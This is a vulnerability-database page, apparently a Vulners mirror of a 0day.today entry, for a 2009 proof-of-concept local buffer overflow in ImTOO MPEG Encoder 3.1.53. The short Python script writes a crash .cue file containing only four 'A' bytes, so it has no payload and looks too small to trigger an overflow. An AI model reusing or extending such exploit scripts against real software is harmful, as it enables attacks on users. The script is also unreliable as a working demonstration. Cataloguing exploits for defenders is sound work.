Lucene search
K

ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) Local Buffer Overflow PoC

🗓️ 06 Aug 2009 00:00:00Reported by opt!x hackerType 
zdt
 zdt
🔗 0day.today👁 13 Views

Exploit code for ImTOO MPEG Encoder 3.1.53 local buffer overflow vulnerability PoC.

Code
===============================================================
ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) Local Buffer Overflow PoC
===============================================================


#!/usr/bin/python
print "ImTOO MPEG Encoder 3.1.53 (.cue/.m3u) local stack overlow POC"
print " finded by : opt!x hacker "
print "download: http://www.soft32.com/download/63-300154-1/mpeg-encoder.exe "
junk = "\x41"*4
# file=open("crash.m3u","w")
file=open("crash.cue","w")
file.write(junk)
file.close()



#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation